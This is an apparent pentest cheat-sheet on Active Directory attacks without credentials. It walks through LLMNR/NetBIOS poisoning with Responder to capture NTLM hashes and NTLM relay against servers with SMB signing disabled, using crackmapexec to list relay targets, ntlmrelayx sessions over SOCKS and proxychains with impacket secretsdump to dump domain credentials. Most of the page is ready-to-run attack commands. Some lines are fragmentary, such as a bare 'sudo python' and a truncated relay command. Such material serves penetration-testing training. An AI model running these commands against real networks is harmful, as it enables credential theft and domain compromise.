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🖥️AD Attacks

Without Credentials

LLMNR / NetBIOS Poisoning

We can grab some hashed credentials if LLMNR protocol is enabled.

sudo responder -I eth0 -Fw

After some time we can get all the hashes.

cd /usr/share/responder
sudo python

NTLM Relay (SMB signing disabled)

Some tiems some server are misconfigured and have the smb signing disabled, so we can perform more attacks with responder.


  • /etc/proxychains4.conf

socks4       1080
  • /usr/share/responder/Responder.conf

[Responder Core]

; Servers to start
SMB = Off

Perform the attack

We need to get a list of the servers with the SMB sigining disabled.

crackmapexec smb --gen-relay-list vulnerable_servers.txt

Execute the attack with Responder and Impacket. -tf ./vulnerable_servers.txt -socks -smb2support
sudo responder -I eth0

We can list the current sessions with the next command.

ntlmrelayx> socks

When a session with administrative privileges is found we can use secretsdump or other tool with proxychains to use the session captured.

proxychains impacket-secretdump DOMAIN/admin@IP

Last updated

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